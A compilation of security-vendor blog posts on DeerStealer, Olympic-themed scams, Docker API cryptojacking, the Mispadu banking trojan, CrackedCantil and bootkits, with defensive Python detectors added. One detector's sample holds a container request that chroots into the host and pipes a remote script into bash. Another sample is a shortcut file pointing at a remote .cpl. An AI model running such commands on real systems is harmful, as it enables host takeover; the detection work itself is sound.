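The domain list above is a textbook typosquatting set, so here is an added example (my own, not part of the original post) of the kind of check a URL filter can apply before the redirect chain lands: a fuzzy brand-term match over the registrable domain, written in Python. The brand terms, the one-entry allowlist and the edit-distance thresholds are assumptions chosen for this illustration; the candidate domains are the ones listed above plus the final landing domain.

```python
"""Fuzzy brand-term matching for typosquatted ad domains.

Added example: brand terms, the one-entry allowlist and the edit-distance
thresholds are assumptions for this illustration.
"""
from __future__ import annotations

# Terms the fake page has to imitate to look like the real product.
BRAND_TERMS = ("google", "authenticator", "chrome")
# Only the genuine registrable domain is trusted here (constructed, minimal).
ALLOWLIST = {"google.com"}

# Candidate domains: the list from the post plus the final landing domain.
CANDIDATES = [
    "gg2024.info", "gg2024.com", "authenticcator-descktop.com",
    "authentificatorgoogle.com", "authentificator-gogle.com",
    "athentificator-gogle.com", "updater-pro.com", "authentificatorgogle.com",
    "authenticattor-googl.com", "chromstore-authentificator.com",
    "authentificcatorgoolgle.com", "authenticator-google.com",
    "authentificator-googl.com", "authentficatorgoogle.com",
    "chromeweb-authenticators.com", "google.com",
]


def levenshtein(a: str, b: str) -> int:
    """Edit distance (insert/delete/substitute) by the usual row-by-row DP."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def max_edits(term: str) -> int:
    """Short terms get one edit of slack, long ones two, to limit false positives."""
    return 1 if len(term) <= 6 else 2


def fuzzy_contains(token: str, term: str) -> bool:
    """True if some substring of token is within max_edits(term) edits of term.
    The sliding window catches concatenations such as 'authentificcatorgoolgle'
    that a plain substring test would miss."""
    if term in token:
        return True
    slack = max_edits(term)
    for width in range(len(term) - slack, len(term) + slack + 1):
        for start in range(max(1, len(token) - width + 1)):
            if levenshtein(token[start:start + width], term) <= slack:
                return True
    return False


def brand_hits(domain: str) -> list[str]:
    """Brand terms the domain imitates, in BRAND_TERMS order; empty if none
    match or the registrable domain is allowlisted."""
    labels = domain.lower().strip(".").split(".")
    registrable = ".".join(labels[-2:])  # naive: no public-suffix list
    if registrable in ALLOWLIST:
        return []
    tokens = [tok for label in labels[:-1] for tok in label.split("-") if tok]
    return [term for term in BRAND_TERMS if any(fuzzy_contains(tok, term) for tok in tokens)]


def flag_domains(domains: list[str]) -> set[str]:
    """Subset of domains that imitate at least one brand term."""
    return {d for d in domains if brand_hits(d)}


if __name__ == "__main__":
    for domain in CANDIDATES:
        print(f"{domain:32} {', '.join(brand_hits(domain)) or '-'}")
```

Run against the list, every lookalike is flagged while the three generic names (gg2024.info, gg2024.com, updater-pro.com) and the genuine google.com pass; those three would need a different signal, such as registration age or the redirect chain itself.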

DeerStealer Inside of a Fake Google Authenticator

The payload is a sample of a fairly new stealer, dubbed DeerStealer. It is rumored to be a reworked variant of the XFiles infostealer, but that makes little difference to the victim. Once Authenticator.exe runs, it launches the malicious payload via DLL hijacking. From then on DeerStealer operates in memory only, leaving no further traces on disk.

%SAMPLEPATH%\5d1e3b113e15fc5fd4a08f41e553b8fd0eaace74b6dc034e0f6237c5e10aa737.exe

Next, the malware connects to one of several C2 addresses embedded in its code and sends the collected information. Besides the items typical for infostealers, such as passwords, session tokens and cryptocurrency wallets, it also gathers a fairly extensive system fingerprint: machine GUID, language, network configuration and computer name.

How to protect against malware scams?

The best protection against malware is to mitigate the problem proactively, so you never reach the point of having malware somewhere in your system. That is easier said than done: as the case above shows, threat actors have plenty of tricks to mislead people. Your own attention, together with proper security software, is the key to avoiding infections.

Review the sites you get software from. Even if an ad on Google suggests a site is legitimate, it may not be, as this case shows. Always check the final URL you land on, and if you are not completely sure, run it through a trusted online URL scanner. Free Website Scanner is one such service.

Use reliable anti-malware software with proactive protection and a network security module. To avoid next-level scams that are practically indistinguishable from legitimate sites, use a protection layer that detects such cases for you. GridinSoft Anti-Malware provides excellent protection against modern threats and covers you during everyday browsing as well.

2024 Olympic Cyberattack Risks: What Should We Expect https://gridinsoft.com/blogs/2024-olympic-cyberattack-risks/ https://gridinsoft.com/blogs/2024-olympic-cyberattack-risks/#respond Sat, 27 Jul 2024 08:51:29 +0000 https://gridinsoft.com/blogs/?p=25962 The Olympic Games is a massive sporting event that attracts billions of people worldwide. But where there are thousands of people – fans and supporters; there are also cybercriminals. Such events have always caused a spike in the number of cyberattacks of different kinds. In this post, we will discuss exactly this – risks of […]

The post 2024 Olympic Cyberattack Risks: What Should We Expect appeared first on Gridinsoft Blog.

The Olympic Games is a massive sporting event that attracts billions of people worldwide. But where there are thousands of fans and supporters, there are also cybercriminals. Events of this scale have always caused a spike in cyberattacks of all kinds. In this post, we will discuss exactly that: the risks of cyberattacks around the 2024 Olympics.

Cyber Threats Facing the 2024 Paris Olympics

On July 26, the Olympic Games kicked off in Paris. As historical data shows, this is a significant challenge not only for the athletes but also for the organizers. The cybersecurity teams in particular need to be vigilant: 450 million attempted cyberattacks were recorded during the previous Olympic Games in Tokyo, and with every advance in technology, experts expect even more this time.

For 2024, 4 billion cyberattacks are expected, roughly nine times the Tokyo figure. As the head of ANSSI (the French national cybersecurity agency, responsible for the cybersecurity strategy of the Games) put it, “We can’t prevent all the attacks, there will not be Games without attacks but we have to limit their impacts on the Olympics”.

Olympic Games 2024 (photo)

2024 Olympics Cyber Threats: Who and Why?

There are a few factors to address before turning to the actual threats: who might want to cause problems at a sporting event, and why. In these volatile times, many countries have tensions between them, and a few of them will certainly carry those disagreements over to the Olympic Games.

One of the key states with an interest in causing disruption and chaos during the Paris Olympics is Russia. Together with its state-aligned threat actors, it has every reason to try to disrupt the Games. The motives are mostly political: grudges against participating countries that support Ukraine in the war would be reason enough, and there are likely other scores it would settle in such an underhanded way.

North Korea, a close ally of Russia, likely wants its share too. Its all-encompassing interest in gathering intelligence pairs naturally with such a massive event, and since North Korean threat actors are tasked with raising foreign currency for the regime, the Games are a feast for money-themed phishing.

Another source of threat actors is the Middle East, a cluster of countries rather than a single one. Though less numerous and more oriented toward regional conflicts and enemies, they would still welcome such a source of data.

A more politically agnostic threat comes from financially motivated actors. While this can overlap with the groups above, it is mostly unrelated to political or personal beliefs: it is just business. Such actors will attack every link in the chain and every area that can be monetized, which I will elaborate on below.

Who is at Risk?

In reality, cybercriminals have boundless opportunities and a vast, untapped field in this year's Olympic Games. This year, 84 companies have become official Olympic partners, and many more are connected through third-party services, such as hotel suppliers or travel and leisure providers.

Besides the organizations and individuals directly or indirectly tied to the event, critical infrastructure and other entities are at risk, including telecommunications, energy, healthcare and logistics in Paris. Individual fans must be particularly vigilant, as there is a high risk of scams such as ticket fraud or fraudulent voting, which we will discuss below.

Key Cybersecurity Risks for the Paris 2024 Olympics

First, let me note that problems began a week before the opening, with the global outage caused by a faulty CrowdStrike update. Although not related to the event itself, that incident affected the preparations for the Games, and it is far from the last problem we will see. With that said, let's dive into the threats we are likely to encounter over the next few weeks.

Phishing

Phishing is rightly one of the most widespread and dangerous cyber threats, and it becomes particularly effective during major events. Scammers send messages posing as official communications, such as notifications or announcements related to the Olympics. These messages most often arrive by email but can also come as SMS.

Typical example of a phishing email

Typically, these emails and text messages claim to come from the International Olympic Committee (IOC) or a related government agency. Red flags include links (often shortened with URL shorteners) and attached files (documents, archives and so on). Clicking such a link or opening such a file can lead to fraud, a malware infection and/or data theft. Scammers may also send messages purportedly from famous athletes or officials, and these messages may even request personal information such as passwords or credit card details.

Malware Attacks

Alongside phishing comes the risk of malware spreading. Fraudsters use email, SMS and other channels for different purposes, but email attracts them most. The reason is its flexibility: one day it carries phishing links, the next it carries malware-laced files. A single hasty click may be all that separates you from having your online accounts compromised, your bank accounts drained and your files encrypted.

Again, the flexibility of email lets adversaries exercise social engineering freely. Celebrity endorsements, whaling, even a friendly chat: all of it combines smoothly with malware delivery, making such attacks tremendously effective.

Social Engineering

Amid the excitement surrounding the Olympic Games, scammers will try to manipulate people. For instance, con artists might pose as the IOC or a financial organization, asking people to support a particular athlete by sending a certain amount of money.

Of course, no sport is complete without betting. Scammers may impersonate betting companies, accepting bets on athletes at unbelievably good odds. Naturally, no one will win anything except the scammers.

Another common scam involves charity collections. Scammers pose as a charitable organization (or an event partner or sponsor) and ask people to donate. Considering how many wars and other disasters are happening in the world, it can be hard to tell the genuine from the fake.

As I have mentioned several times, the political situation heavily influences such events, and the 2018 Winter Games in Pyeongchang are the example. Russian hackers launched a computer worm called “Olympic Destroyer” against the opening ceremony, disrupting Wi-Fi at the stadium, the RFID systems and the broadcast of the ceremony. Although Moscow denies involvement, in 2020 the US Department of Justice charged six officers of Russian military intelligence over the attack.

Fortunately, this year's ceremony went smoothly, but that does not mean threat actors will not try to sabotage the event. There is a high likelihood that, in an attempt to disrupt the Games, malicious actors will send provocative SMS messages, such as notifications of a terrorist threat. Although not profitable, this can cause panic and interfere with the Games; it can also dull people's vigilance or make them distrust official messages.

How to Stay Safe

The first recommendation is to be extremely careful with any message, especially one related to the Olympic Games. Verify the source of the information and do not open suspicious attachments or links, even if they seem convincing. If you come across a fundraiser or advertisement related to the Olympics, do your own research and investigate it thoroughly before participating, entering your information or sending money.

Do not fall for fakes. Scammers may launch advertising campaigns offering, for example, an app to download or a link to watch a live broadcast in high quality. These sites are often placeholders that ask you to send an SMS to receive an “up-to-date” link or to download an app. After the SMS or payment you will not receive a link to the broadcast, and in the worst case you will download malicious software.

Use an anti-malware solution. In the era of AI and deepfakes, it is increasingly difficult to tell fake from real, and malicious actors can convincingly promote phishing links through ads or the methods described above. An anti-malware solution such as GridinSoft Anti-Malware will stop malware from downloading and deploying on your device, and its Internet Security module can block suspicious or dangerous sites before they even attempt to serve a malicious file.

Docker API Vulnerability Exploited in Cryptojacking Campaign https://gridinsoft.com/blogs/docker-api-vulnerability-cryptojacking-campaign/ https://gridinsoft.com/blogs/docker-api-vulnerability-cryptojacking-campaign/#respond Tue, 06 Feb 2024 14:09:32 +0000 https://gridinsoft.com/blogs/?p=19347 A new campaign named “Commando Cat” uses a Docker API vulnerability. It uses Docker to gain initial access to a system and then deploys a series of malicious payloads. This leads to cryptocurrency mining on compromised hosts. Docker API Vulnerability Exploited Investigators have discovered a new malware campaign aimed at Docker API endpoints. The malware […]

The post Docker API Vulnerability Exploited in Cryptojacking Campaign appeared first on Gridinsoft Blog.

A new campaign named “Commando Cat” abuses exposed Docker API endpoints. The attackers use a misconfigured, Internet-reachable Docker API for initial access and then deploy a series of malicious payloads, ending with cryptocurrency mining on the compromised hosts.

Docker API Vulnerability Exploited

Investigators have discovered a new malware campaign aimed at Docker API endpoints. The malware is called Commando Cat, and its purpose is to take advantage of misconfigured Docker APIs, which lets it run arbitrary commands in containers on the affected hosts. According to the report, Commando Cat has nine distinct attack modules that carry out several tasks: downloading and executing additional payloads, scanning for open ports and vulnerable services, stealing credentials and sensitive data, mining cryptocurrency, launching distributed denial-of-service (DDoS) attacks, and spreading to other containers and hosts.

The campaign was first detected in January 2024. It is the second Docker-related campaign identified in 2024, following the malicious deployment of the 9hits traffic exchange application. In this case, specialists observed a spike in malicious activity from a single IP address in China. The researchers traced the source to a Docker container running on a cloud server infected by Commando Cat: the malware had reached the Docker API through an exposed port and executed a series of commands to download and run its modules.

Commando Cat Attacks Docker

Commando Cat delivers its payloads to Docker API instances exposed to the Internet. The attacker instructs Docker to fetch an image from “cmd.cat”, the public Commando project that generates minimal Docker images containing whatever command the user needs. This choice of image is likely an attempt to appear benign and avoid suspicion. After creating a container with the host's root filesystem mounted inside it, the attacker uses the “chroot” command to step out of the container onto the host's operating system (chroot alone cannot escape a container; it only works because the host filesystem has been bind-mounted in). The initial command then looks for the services “sys-kernel-debugger”, “gsc”, “c3pool_miner” and “dockercache”, all of which the attacker creates after infection.

The command checks whether these services are active on the system

Experts also believe the attacker checks for the “sys-kernel-debugger” service to avoid competing with another campaign. Once these checks pass, the attacker reruns the container with a different command that infects the host by copying specific binaries onto it. This step renames the binaries to evade detection, a common tactic in cryptojacking campaigns. The attacker also deploys various payloads with parameters such as “tshd”, “gsc” and “aws”.

The final payload is delivered as a base64-encoded script. It deploys an XMRig cryptominer and “secures” the Docker install on the infected host: first it removes all containers created with a particular command, then every container whose command does not contain chroot, and it kills other mining services before setting up its own miner. The malware uses a systemd service to achieve persistence for the XMRig stager, and hides the docker-cache and docker-proxy services with the hid script. Finally, Commando Cat black-holes the Docker registry to eliminate the risk of competition.

Safety Tips

Protecting against a sophisticated threat like Commando Cat is a challenging affair. Its detection evasion methods make it hard for classic security solutions to spot. Still, there are enough measures to make this malware much less of a threat.

  • Never expose the Docker API without authentication. The campaign needs an Internet-reachable daemon endpoint; keep the API on the local Unix socket, or, if remote access is required, enable TLS client certificate verification and restrict access with a firewall.
  • Use a firewall. Configure strict packet filtering: allow only the network connections you need and block everything else. Limit outbound connections from containers as well, so a compromised container cannot freely fetch payloads or reach a mining pool.
  • Employ XDR. Extended Detection and Response systems analyze network traffic and identify anomalies; suspicious activity should raise alerts about a potential intrusion. Network activity monitoring can also spot unusual traffic toward the Docker API.
  • Training and awareness. Training users on secure Docker usage and basic cybersecurity practices prevents most problems. Educated users are less likely to fall for social engineering or mishandle data.
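As an added example for the Docker hardening advice above (not code from the Commando Cat report or this post), the Python below audits two things an operator controls: the daemon's listener configuration and any POST /containers/create request body arriving at the API. The daemon.json fragments and the two request bodies are constructed; the image reference and the download host in the attacker-style request are assumed placeholders that only mirror the shape of the technique described above.

```python
"""Audit Docker daemon exposure and container-create requests for the pattern
Commando Cat relies on: an unauthenticated TCP API plus a container that
mounts the host root and chroots into it.

Added example: the daemon.json fragments and request bodies are constructed
to mirror the shape of the Docker Engine API; image reference and download
host in the attacker-style request are assumed placeholders.
"""
from __future__ import annotations

import json
from urllib.parse import urlparse

# Constructed daemon.json fragments: the exposed setup versus a TLS-only one.
WEAK_DAEMON_JSON = {"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}
HARDENED_DAEMON_JSON = {
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
}

# Constructed POST /containers/create bodies. The attacker-style one mounts the
# host root at /hs and chroots into it; image tag and host are placeholders.
ATTACKER_REQUEST = json.loads("""
{"Image": "cmd.cat/chattr",
 "Cmd": ["chroot", "/hs", "bash", "-c", "curl -s http://203.0.113.10/user.sh | bash"],
 "HostConfig": {"Binds": ["/:/hs"], "Privileged": true, "PidMode": "host"}}
""")
BENIGN_REQUEST = json.loads("""
{"Image": "nginx:1.25",
 "Cmd": ["nginx", "-g", "daemon off;"],
 "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"]}}
""")

ALL_INTERFACES = {"0.0.0.0", "::", ""}


def audit_daemon_config(cfg: dict) -> list[str]:
    """Findings for daemon.json 'hosts' entries that expose the API over TCP."""
    findings = []
    for host in cfg.get("hosts", []):
        if not host.startswith("tcp://"):
            continue  # the Unix socket is guarded by filesystem permissions
        bind_addr = urlparse(host).hostname or ""
        if not cfg.get("tlsverify"):
            findings.append(f"{host}: TCP listener without tlsverify; anyone who can reach it is root on the host")
        elif bind_addr in ALL_INTERFACES:
            findings.append(f"{host}: TLS-authenticated listener bound to all interfaces; restrict with a firewall")
    return findings


def _as_list(value) -> list[str]:
    """Cmd/Entrypoint may be a string or a list in the API; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [str(value)]


def audit_create_request(body: dict) -> list[str]:
    """Findings for a container-create body that would let the container reach the host."""
    findings = []
    host_cfg = body.get("HostConfig", {})
    for bind in host_cfg.get("Binds", []):
        src = bind.split(":", 1)[0]
        if src == "/" or src.startswith("/proc") or src.endswith("docker.sock"):
            findings.append(f"host path {src!r} bind-mounted into the container")
    if host_cfg.get("Privileged"):
        findings.append("Privileged=true")
    for key in ("PidMode", "NetworkMode", "IpcMode"):
        if host_cfg.get(key) == "host":
            findings.append(f"{key}=host")
    command = " ".join(_as_list(body.get("Entrypoint")) + _as_list(body.get("Cmd")))
    if "chroot" in command.split():
        findings.append("command invokes chroot (container-to-host pivot once a host path is mounted)")
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(name, audit_daemon_config(cfg) or "ok")
    for name, req in (("attacker", ATTACKER_REQUEST), ("benign", BENIGN_REQUEST)):
        print(name, audit_create_request(req) or "ok")
```

The request audit is the kind of rule an authorization plugin or API gateway in front of the daemon can enforce; the daemon audit belongs in a config linter or CI check. Neither replaces the basic fix, which is not to listen on TCP at all unless TLS client verification is on.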

Mispadu Banking Trojan Exploits SmartScreen Flaw https://gridinsoft.com/blogs/mispadu-banking-trojan-exploits-smartscreen-flaw/ https://gridinsoft.com/blogs/mispadu-banking-trojan-exploits-smartscreen-flaw/#respond Mon, 05 Feb 2024 14:03:26 +0000 https://gridinsoft.com/blogs/?p=19408 Recent research uncovers a new sample of Mispadu malware that uses a SmartScreen bypass flaw to integrate itself into the system. This banking trojan from 2019 uses the vulnerability discovered in late 2023 to target mainly LATAM users. Mispadu Trojan Uses SmartScreen Bypass The extensive research regarding Mispadu malware done by Unit 42, among other […]

The post Mispadu Banking Trojan Exploits SmartScreen Flaw appeared first on Gridinsoft Blog.

Recent research uncovers a new sample of Mispadu malware that uses a SmartScreen bypass flaw to integrate itself into the system. This banking trojan from 2019 uses the vulnerability discovered in late 2023 to target mainly LATAM users.

Mispadu Trojan Uses SmartScreen Bypass

The extensive research on Mispadu malware done by Unit 42 underscores, among other things, the use of a critical Windows vulnerability to circumvent SmartScreen protection. The flaw, tracked as CVE-2023-36025, was disclosed and fixed by Microsoft back in November 2023. As of early February 2024, however, there are already several cases of malware exploiting it, meaning that many users still have not installed the patch. Earlier, we wrote about a Phemedrone Stealer distribution campaign that uses the same detection evasion approach.

The flaw is rather easy to exploit: all that is needed is a specially crafted .url (Internet Shortcut) file. Because of the bug, opening such a file does not trigger the SmartScreen warning about running a potentially dangerous file. In the background, the shortcut connects to the command server and downloads the payload as a binary.

Contents of the URL file used to download Mispadu banker

The cybercriminals behind Mispadu commonly use email spam to deliver these crafted URL files. Other distribution methods may be even more successful, for example sharing the file via social media, as the Phemedrone operators do.
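Since the delivery object here is a plain .url file, which is just an INI-style text file, a mail gateway or SOC can triage such attachments before they reach SmartScreen at all. The following Python is an added example, not from the Unit 42 research or this post: it parses the [InternetShortcut] section and flags targets that point at remote file shares, executable or archive extensions, bare IP hosts, or a remote IconFile. Both shortcut bodies are constructed samples using the 203.0.113.0/24 documentation range; the heuristics are general ones, not the specific content of the Mispadu file.

```python
"""Triage Internet Shortcut (.url) attachments before SmartScreen ever sees them.

Added example: the two shortcut bodies are constructed samples using the
203.0.113.0/24 documentation range; the heuristics are general ones, not the
specific content of the Mispadu file.
"""
from __future__ import annotations

import configparser
from urllib.parse import urlparse

RISKY_EXTENSIONS = (".exe", ".dll", ".cpl", ".scr", ".msi", ".hta", ".js", ".vbs", ".lnk", ".zip")
REMOTE_FILE_SCHEMES = {"file", "smb"}

# A shortcut as a browser would write it for a bookmark: nothing to flag.
BENIGN_URL_FILE = """[InternetShortcut]
URL=https://support.google.com/accounts/
IDList=
HotKey=0
"""

# Constructed malicious-style shortcut: target is a file share on a bare IP,
# the file type is a Control Panel applet, and the icon also loads remotely.
SUSPICIOUS_URL_FILE = """[InternetShortcut]
URL=file://203.0.113.7/share/invoice_2024.cpl
IconFile=\\\\203.0.113.7\\share\\icon.ico
IconIndex=0
"""


def parse_url_file(text: str) -> dict[str, str]:
    """Return the [InternetShortcut] keys (lower-cased) or {} if unparsable."""
    parser = configparser.ConfigParser(strict=False, interpolation=None)
    try:
        parser.read_string(text)
    except configparser.Error:
        return {}
    if not parser.has_section("InternetShortcut"):
        return {}
    return dict(parser.items("InternetShortcut"))


def _is_unc(path: str) -> bool:
    return path.startswith("\\\\")


def _is_bare_ipv4(host: str) -> bool:
    parts = host.split(".")
    return len(parts) == 4 and all(p.isdigit() and 0 <= int(p) <= 255 for p in parts)


def triage_url_file(text: str) -> list[str]:
    """Reasons to quarantine a .url attachment; an empty list means nothing found."""
    fields = parse_url_file(text)
    target = fields.get("url", "")
    if not target:
        return ["no URL= field (malformed shortcut)"]
    parsed = urlparse(target)
    scheme = parsed.scheme.lower()
    host = parsed.hostname or ""
    reasons = []
    if scheme in REMOTE_FILE_SCHEMES or _is_unc(target):
        reasons.append(f"target is a remote file share ({scheme or 'UNC'}): {target}")
    if target.lower().endswith(RISKY_EXTENSIONS):
        reasons.append(f"target has an executable/archive extension: {target.rsplit('.', 1)[-1]}")
    if _is_bare_ipv4(host):
        reasons.append(f"target host is a bare IPv4 address: {host}")
    icon = fields.get("iconfile", "")
    if _is_unc(icon) or urlparse(icon).scheme.lower() in REMOTE_FILE_SCHEMES | {"http", "https"}:
        reasons.append(f"IconFile loads from a remote location: {icon}")
    return reasons


if __name__ == "__main__":
    for name, body in (("benign", BENIGN_URL_FILE), ("suspicious", SUSPICIOUS_URL_FILE)):
        print(name, triage_url_file(body) or "clean")
```

A shortcut that legitimately arrives by email almost always targets an https page, so in practice a gateway can quarantine on any remote-file-share or risky-extension hit and let the rest through for a closer look.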

What is Mispadu Malware?

Mispadu itself is a rather unusual banking trojan that emerged back in 2019. It stands out for its peculiar region check, persistent code encryption and heavy obfuscation. For instance, to decide whether it is running in a prohibited region, it does not use a “traditional” IP address ban list. Instead, Mispadu checks the offset of the current system time from UTC and stops executing if the value exceeds the set limit.

Equation the malware runs to identify whether it can or cannot run in the region

This financial infostealer targets a range of financial websites, searching the browsing history for matches. Once Mispadu finds a site from its target list, it looks up the saved credentials in the browser's autofill data and sends them to the command server. As a result, the operators get a full set of credentials for financial services.

Despite having a flexible mechanism for targeting different banking and crypto services in different countries, the stealer focuses mainly on ones in the Americas and Western Europe. It is not clear whether this selection is related to the location of the malware operators or to other factors.

How to Protect Yourself?

Malware like Mispadu is serious, but it can rarely be called unavoidable. It exploits a well-known flaw that is fixed in current Windows updates, so simply keeping the system updated removes the primary infection vector this malware relies on.

Nonetheless, keep in mind that the file itself reaches the target system inside a spam email. Email remains the main propagation method for malware, scams and phishing attacks. Learn to tell a phishing email from a genuine one, and you will have far fewer chances of getting into trouble at all.

Use reliable anti-malware software as an additional protection layer. Everyone makes mistakes, and that is completely normal; only those who do nothing never make one. To be covered in such cases, I recommend GridinSoft Anti-Malware, a reliable, lightweight and easy-to-use anti-malware solution whose detection mechanisms can stop malware like this at the very beginning.

CrackedCantil Dropper Delivers Numerous Malware https://gridinsoft.com/blogs/crackedcantil-dropper-malware/ https://gridinsoft.com/blogs/crackedcantil-dropper-malware/#comments Fri, 02 Feb 2024 22:18:11 +0000 https://gridinsoft.com/blogs/?p=19352 CrackedCantil is a unique dropper malware sample that operates with a wide variety of malware families. Infecting with one may effectively mean up to five other malware types running in the system. Let’s break down on what it is, how it spreads, and why it is so dangerous. What is CrackedCantil? CrackedCantil is a dropper […]

The post CrackedCantil Dropper Delivers Numerous Malware appeared first on Gridinsoft Blog.

CrackedCantil is a distinctive dropper that delivers a wide variety of malware families. A single infection can effectively mean up to five other malware types running on the system. Let's break down what it is, how it spreads and why it is so dangerous.

What is CrackedCantil?

CrackedCantil is a dropper malware discovered and described by the malware analyst LambdaMamba. The name has two parts: “Cracked” refers to cracked software, its primary distribution vector, and “Cantil” to the cantil viper, a highly venomous species, hinting at the malware's harmful potential. By nature, CrackedCantil is a loader/dropper that aims to deliver many different malware samples, including stealers, ransomware, spyware and backdoors.

The CrackedCantil process tree (source: ANY.RUN)

Overview of distribution ways

The main distribution channel for this malware is cracked software. People looking for free versions of paid software often download “cracked” builds: legitimate programs modified to bypass their licensing checks. Attackers exploit this demand to spread malware.

The process begins on questionable websites or forums. After the user downloads and runs what looks like an installer, malware lands on the computer, either disguised as useful files or embedded in the installer executable itself. Once activated, the malware starts infecting the system, which may involve several actions: installing additional malware, stealing data, encrypting files for ransom and turning the device into part of a botnet.

CrackedCantil Delivers Droppers, Spyware and Ransomware

The tree of processes involved in the incident is quite complicated, and several infamous malware families were found to be involved. Let’s look at these families in the overall threat picture, focusing on the role of each in the symphony of cyberattacks.

PrivateLoader

PrivateLoader is a polymorphic downloader that uses various obfuscation and packing techniques to evade antivirus detection. It is written in C++ and is often distributed with cracked software. It downloads and executes additional malicious modules from its command-and-control servers, and it typically checks the execution environment to avoid running in virtual machines or analysis sandboxes, which makes it harder for security researchers to investigate.

SmokeLoader

SmokeLoader, also known as Dofoil, is a loader used to deliver additional malware such as backdoors, keyloggers and trojans. It is also capable of stealing information. SmokeLoader injects malicious code into system processes, thereby evading detection.

C2 panel of the SmokeLoader backdoor

Lumma

Lumma is an infostealer that received quite a bit of attention over the last few months. It can extract personal and financial data from a variety of sources on infected computers, including web browsers, email clients, and cryptocurrency wallet files. Most commonly, Lumma Stealer propagates through social engineering and phishing attacks. It can also evade antivirus detection and transmit collected data to a remote command and control (C&C) server.

RedLine

RedLine Stealer is a malicious program designed to steal various types of sensitive information from infected computers. It is capable of extracting browser credentials, credit card data, e-wallet passwords, and system information. Having appeared back in 2020, it quickly became one of the most popular stealers on the malware market.

Image: Telegram bot that malware devs use to promote RedLine

Socks5Systemz

Socks5Systemz is malware that infects devices through PrivateLoader and Amadey. Infected devices are turned into proxies that forward malicious traffic, and the malware locates its C2 server using a domain generation algorithm (DGA).

STOP/Djvu Ransomware

STOP Ransomware is an encryptor characterized by appending unique extensions to encrypted files (.hhaz, .cdaz, .cdcc, and the like) and creating ransom text files that contain instructions for the victim on how to make the payment and obtain the decryptor. Djvu is a variant of the STOP ransomware that can include multiple levels of stealth, making it harder to analyze. STOP/Djvu encrypts files using AES-256 and Salsa20. It is known to collaborate with other malware, such as infostealers, to steal sensitive information before encryption.

Image: The outcome of Djvu ransomware, encrypted files

How dangerous is CrackedCantil?

CrackedCantil is another player on the dropper malware market, but its unique ability to coordinate different types of malware sets it apart from the crowd. It creates a so-called “symphony of malware” in which each element is carefully tuned for maximum impact. The growing popularity of CrackedCantil points to its effectiveness in both detection evasion and malware delivery, and its wide distribution is driven by users’ desire to access paid software for free.

To avoid infection through cracked programs, the following precautions are recommended:

  • Always purchase software from official vendors or directly from the developers. This not only ensures the legitimacy of your software, but also ensures that you receive all necessary security updates.
  • Regularly update all installed programs and the operating system. This helps protect your system from vulnerabilities that can be exploited by malware.
  • Use a reliable antivirus solution and scan your system regularly. Modern antivirus programs frequently update their databases to recognize new threats.
  • Increase your and your employees’ knowledge of cyber threats and social engineering techniques. Knowing how threats spread can significantly reduce the risk of exposure.

The post CrackedCantil Dropper Delivers Numerous Malware appeared first on Gridinsoft Blog.

What is a Bootkit? Explanation & Protection Guide
https://gridinsoft.com/blogs/what-is-bootkit/
Fri, 26 Jan 2024 09:05:36 +0000

Bootkit is a rather unusual and unspoken, though widely used kind of malware. These advanced malware types operate beneath the surface, embedding themselves in a computer’s boot sector, allowing them to activate before the operating system (OS) even starts. But why do they need such a deep integration? And where are they used? Let’s find out.

What is a Bootkit?

A bootkit is a sophisticated type of malware that loads and operates before the operating system starts, during the boot process. Unlike many other malware types that target software vulnerabilities or user actions, bootkits embed themselves in the system’s boot process, making them exceptionally challenging to detect and remove.

Type of Bootkit

One of the defining characteristics of a bootkit is its ability to load before the operating system (OS) itself. This gives the attacker a significant advantage, as they can intercept and manipulate the boot process, allowing them to gain control over the system even before the user logs in. Being integrated that close to the bare metal also opens the possibility of exploiting kernel-level vulnerabilities and hardware flaws.

Image: Bootkit history

Bootkits vs. Rootkits

While often confused, bootkits and rootkits operate at different levels of a system. Rootkits infect the OS after it loads, granting their operator the highest privileges possible, whereas bootkits are embedded in the system bootloader or even in the motherboard firmware. This changes both the capabilities and the purpose of the bootkit. What the two have in common is that both are advanced, high-severity threats.

Functionalities of Bootkits

Bootkits are versatile in their malicious functionalities. To understand and combat these malicious entities effectively, we must dissect the intricacies of their functionalities.

  • Persistence. One of the primary functionalities of bootkits is their persistence. They can implant themselves in the GUID Partition Table (GPT), the more modern disk layout. This positioning allows bootkits to remain active and undetected through system reboots and even full operating system reinstalls, contributing to their prolonged presence and challenging removal from the infected system.
  • Data Theft. Some bootkits are engineered to steal sensitive data from the compromised system. During the boot process, they may intercept and exfiltrate data such as login credentials, financial information, personal files, and any other valuable data they can access.
  • Backdoor Access. Bootkits can create backdoors within the system, which provide unauthorized remote access to the compromised computer. Adversaries will be able to execute commands, upload additional malware, or manipulate the system as they see fit. It essentially grants them a persistent presence on the compromised device.
  • Bypassing security measures. One of the key traits of bootkits is their ability to circumvent security measures. They load themselves into the system’s memory before any security software or antivirus programs have a chance to activate. As a result, they can operate undetected and unimpeded by security tools, allowing them to carry out their malicious activities without being stopped.

Can I detect and remove the bootkit?

Detecting a bootkit before it is injected into the firmware or the first partitions of the hard disk is the most effective way to prevent it from causing damage. However, detecting a bootkit infection is not an easy task, and even if it is detected, removing it can be even more challenging.

If the bootkit has been injected into the EFI partition, only a complete operating system reinstallation can remove the malicious bootkit code from the disk. However, this may not be enough if the malware managed to infect the firmware, which will result in a new system being compromised, too. In such cases, it is advisable to determine which bootkit has infected the system and use special LiveCD antivirus utilities to clean the system of any malicious code.

How to Prevent Bootkits

Preventing bootkit malware requires taking several measures to reduce the risk of infection. Here are some steps that can be taken:

  1. Secure Boot and UEFI
    Secure Boot is a feature available in UEFI-enabled computers. Its purpose is to ensure that only trusted software is loaded during the boot process. UEFI itself is a more secure and modern technology that allows firmer control over the boot process. This helps prevent bootkit malware from infecting the computer. Still, recent developments have shown that the BlackLotus UEFI bootkit can bypass Secure Boot.
